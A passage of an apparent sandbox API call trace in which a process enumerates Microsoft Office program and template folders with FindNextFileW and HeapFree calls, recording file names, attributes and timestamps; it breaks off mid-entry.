1 [0186.027] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.027] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc53b9f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc53b9f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc53b9f9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="tr", cAlternateFileName="")) returned 1 [0186.027] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.027] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf80d6078, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf80d6078, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf80d6078, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="uk", cAlternateFileName="")) returned 1 [0186.028] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.028] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c46ba0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6c46ba0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6c46ba0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="vi", cAlternateFileName="")) returned 1 [0186.028] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.028] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc40a725, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc40a725, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc40a725, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0186.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.030] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x659fb9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x659fb9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x659fb9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0186.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.030] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x659fb9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x659fb9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x659fb9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0186.030] FindClose (in: hFindFile=0x43a2ad8 | out: hFindFile=0x43a2ad8) returned 1 [0186.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0186.030] FindNextFileW (in: hFindFile=0x43a2e98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddaac59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddaac59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1b382177, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3392, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="MSO0127.ACL", cAlternateFileName="")) returned 1 [0186.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0186.036] FindNextFileW (in: hFindFile=0x43a2e98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4ae41a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xdb652e29, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdcec30aa, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x205e48, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="ONENOTE.EXE", cAlternateFileName="")) returned 1 [0186.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0186.042] FindNextFileW (in: hFindFile=0x43a2e98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1d319566, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x656d8, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="OUTLPH.DLL", cAlternateFileName="")) returned 1 [0186.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0186.048] FindNextFileW (in: hFindFile=0x43a2e98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1d791bfc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2169a085, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf2be48, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="PDFREFLOW.EXE", cAlternateFileName="PDFREF~1.EXE")) returned 1 [0186.050] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.050] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf318faf5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf318faf5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf31b5d3e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1036", cAlternateFileName="")) returned 1 [0186.050] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.050] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe34d5ed4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe34d5ed4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe34d5ed4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="3082", cAlternateFileName="")) returned 1 [0186.050] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.050] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc52c782a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc52c782a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc52c782a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="msgr8en.dub", cAlternateFileName="")) returned 1 [0186.051] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0186.051] FindNextFileW (in: hFindFile=0x43a2e98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd41f54a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xdec90856, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xded02ee7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x14c660, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="PropertyModel.dll", cAlternateFileName="PROPER~1.DLL")) returned 1 [0186.114] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0186.114] FindNextFileW (in: hFindFile=0x43a2e98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x2296098c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd0460, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="PUBCONV.DLL", cAlternateFileName="")) returned 1 [0186.123] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0186.123] FindNextFileW (in: hFindFile=0x43a2e98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda173cc, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeda173cc, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="QUERIES", cAlternateFileName="")) returned 1 [0186.123] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0186.123] FindNextFileW (in: hFindFile=0x43a2e98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd71a51a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcd71a51a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcd7406da, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xad30, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="rdpqoemetrics.dll", cAlternateFileName="RDPQOE~1.DLL")) returned 1 [0186.124] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0186.124] FindNextFileW (in: hFindFile=0x43a2e98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1db7a09, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1db7a09, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4fef2b0, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x8aa50, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="SAVASWEB.DLL", cAlternateFileName="")) returned 1 [0186.124] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0186.124] FindNextFileW (in: hFindFile=0x43a2e98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xede1d373, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xede1d373, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x237aeb7f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x397278, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="STSLIST.DLL", cAlternateFileName="")) returned 1 [0186.466] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43e5098 | out: hHeap=0x680000) returned 1 [0186.470] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa326fd, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4cce0ca, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4cce0ca, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1033", cAlternateFileName="")) returned 0 [0186.470] FindClose (in: hFindFile=0x43a2fd8 | out: hFindFile=0x43a2fd8) returned 1 [0186.470] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0186.470] FindNextFileW (in: hFindFile=0x43a2e98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x7f63b8, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1159842, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1349614, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x14a640, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="VISIO.EXE", cAlternateFileName="")) returned 1 [0186.472] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0186.472] FindNextFileW (in: hFindFile=0x43a2e98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xede4358a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xede4358a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x245644bf, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2851, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="XML2WORD.XSL", cAlternateFileName="")) returned 1 [0186.472] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0186.473] FindNextFileW (in: hFindFile=0x43a2998, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8396fbd3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3b1a0d3d, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b1a0d3d, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="rsod", cAlternateFileName="")) returned 1 [0186.476] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0186.476] FindNextFileW (in: hFindFile=0x43a2998, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xb48c20e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb48c20e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0186.479] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0186.479] FindNextFileW (in: hFindFile=0x43a2cd8, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb48c20e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xb6099da, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb6099da, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 0 [0186.479] FindClose (in: hFindFile=0x43a2cd8 | out: hFindFile=0x43a2cd8) returned 1 [0186.479] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0186.479] FindNextFileW (in: hFindFile=0x43a2998, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb2fdc25, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xeb2fdc25, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0186.482] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.482] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb5bd4f1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xb6a2342, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb6a2342, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Part", cAlternateFileName="")) returned 1 [0186.484] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.484] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb5bd4f1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xb6a2342, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb6a2342, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Part", cAlternateFileName="")) returned 0 [0186.484] FindClose (in: hFindFile=0x43a2d18 | out: hFindFile=0x43a2d18) returned 1 [0186.484] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0186.484] FindNextFileW (in: hFindFile=0x43a2cd8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xb6099da, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xb6099da, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb67c092, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x30f09, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="AdjacencyLetter.dotx", cAlternateFileName="ADJACE~1.DOT")) returned 1 [0186.487] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0186.488] FindNextFileW (in: hFindFile=0x43a2cd8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xb787155, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xb787155, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb787155, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf6a1, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="LoanAmortization.xltx", cAlternateFileName="LOANAM~1.XLT")) returned 1 [0186.488] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43e5098 | out: hHeap=0x680000) returned 1 [0186.488] FindNextFileW (in: hFindFile=0x43a2e98, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb760eed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xb7ad38b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb81fa9e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0186.488] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43e5098 | out: hHeap=0x680000) returned 1 [0186.488] FindNextFileW (in: hFindFile=0x43a2e98, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb760eed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xb7ad38b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb81fa9e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 0 [0186.489] FindClose (in: hFindFile=0x43a2e98 | out: hFindFile=0x43a2e98) returned 1 [0186.489] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0186.489] FindNextFileW (in: hFindFile=0x43a2f58, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb760eed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xb760eed, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb760eed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="16", cAlternateFileName="")) returned 0 [0186.489] FindClose (in: hFindFile=0x43a2f58 | out: hFindFile=0x43a2f58) returned 1 [0186.489] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0186.490] FindNextFileW (in: hFindFile=0x43a2cd8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xb81fa9e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xb81fa9e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb81fa9e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1db9f, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="OriginLetter.Dotx", cAlternateFileName="ORIGIN~3.DOT")) returned 1 [0186.490] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0186.491] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24517fc9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x24517fc9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x24517fc9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Presentation Designs", cAlternateFileName="PRESEN~1")) returned 1 [0186.492] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0186.492] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24517fc9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x24517fc9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x24517fc9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Presentation Designs", cAlternateFileName="PRESEN~1")) returned 0 [0186.492] FindClose (in: hFindFile=0x43a29d8 | out: hFindFile=0x43a29d8) returned 1 [0186.492] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0186.492] FindNextFileW (in: hFindFile=0x43a2998, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x845a7d02, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb2fdc25, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xeb2fdc25, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="VFS", cAlternateFileName="")) returned 1 [0186.536] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0186.536] FindNextFileW (in: hFindFile=0x43a2dd8, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc0c33db, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc0c33db, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc2b31ff, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x183c8, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="MySharePoints.ico", cAlternateFileName="MYSHAR~1.ICO")) returned 1 [0186.537] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0186.537] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39dee10 | out: 